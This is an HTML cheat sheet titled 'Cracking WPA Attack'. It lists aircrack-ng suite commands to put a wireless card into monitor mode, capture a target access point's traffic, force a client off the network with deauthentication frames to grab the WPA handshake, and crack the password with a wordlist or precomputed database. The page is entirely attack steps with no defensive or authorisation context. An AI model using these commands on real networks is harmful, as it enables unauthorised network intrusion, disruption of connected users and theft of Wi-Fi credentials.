<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Cracking WPA Attack</title>
</head><body>Cracking WPA Attack<br/>
----------------------------<br/>
<br/>
Begin by placing your wireless card into monitor mode on the channel number of the AP:<br/>
<br/>
airmon-ng start &lt;interface&gt; &lt;AP channel&gt;<br/>
<br/>
Start an Airodump capture, filtering on the AP channel and BSSID, saving the capture to<br/>
disk:<br/>
<br/>
airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;<br/>
<br/>
Deauthenticate a connected client to force it to complete the 4-way handshake:<br/>
<br/>
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;<br/>
<br/>
Crack the WPA password with Aircrack-ng:<br/>
<br/>
aircrack-ng -w &lt;wordlist&gt; &lt;capture&gt;<br/>
<br/>
Alternatively, if you have and Airolib-ng database, it can be passed to Aircrack:<br/>
<br/>
aircrack-ng -r &lt;db name&gt; &lt;capture&gt;</body></html>